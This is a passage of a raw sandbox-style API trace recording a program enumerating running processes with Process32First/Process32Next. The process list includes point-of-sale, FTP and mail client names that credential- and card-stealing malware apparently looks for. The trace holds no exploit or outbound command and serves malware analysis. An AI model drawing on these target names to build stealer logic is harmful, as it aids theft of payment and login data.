th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0226.209] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0226.210] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0226.212] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0226.242] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0226.325] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0226.340] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0226.341] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0226.353] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0226.361] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0226.365] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0226.367] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0226.375] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0226.376] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0226.378] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.380] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.381] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.382] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0226.384] CloseHandle (hObject=0xdc4) returned 1 [0226.384] Sleep (dwMilliseconds=0x64) [0226.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0226.556] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.559] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.561] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.562] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.564] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.566] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.568] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.569] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.571] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.573] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.578] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.579] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.581] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.583] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.585] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.587] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.639] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.641] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.643] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.645] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.647] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0226.649] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0226.650] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.655] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.657] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0226.659] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0226.661] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0226.663] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0226.665] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.669] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0226.671] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.673] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.675] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0226.677] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0226.679] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0226.680] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0226.710] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0226.712] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0226.714] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0226.716] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0226.718] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0226.720] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0226.721] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0226.723] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0226.725] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0226.727] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0226.728] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0226.730] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0226.732] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0226.734] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0226.736] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0226.737] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0226.739] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0226.741] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0226.743] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0226.744] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0226.762] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0226.764] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0226.765] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0226.767] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0226.769] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0226.772] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0226.774] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0226.776] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0226.778] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0226.781] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0226.783] Process32Next (in: hSnapshot=0x2278, 